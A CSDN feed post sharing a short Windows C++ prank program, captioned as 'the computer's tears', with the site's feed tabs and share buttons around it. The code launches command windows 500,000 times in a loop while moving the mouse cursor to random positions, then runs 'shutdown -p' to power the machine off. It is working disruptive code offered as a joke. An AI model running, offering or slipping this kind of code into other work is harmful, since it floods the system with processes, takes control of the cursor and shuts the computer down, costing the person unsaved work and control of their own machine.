热门

最新

红包

立Flag

投票

同城

我的

发布
weixin_61058873
提那米苏
3 年前
trueweixin_61058873

#include <bits/stdc++.h>
#include <windows.h>
using namespace std;

int main(){
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
int t=500000;
while(t--) {
system("start");
SetCursorPos(rand()%x,rand()%y);
}
system("shutdown -p");
return 0;
}//电脑的眼泪C++

CSDN App 扫码分享
分享
评论
1
打赏
  • 复制链接
  • 举报
下一条:
基于uniapp和fastAPI制作的个人课表APP,bug多多,乐趣少少项目已开源。1、 github:https://github.com/TonyTang-dev/classSchedule/tree/main2、 gitee: https://gitee.com/TangGarlic/classSchedule严禁恶意使用。
立即登录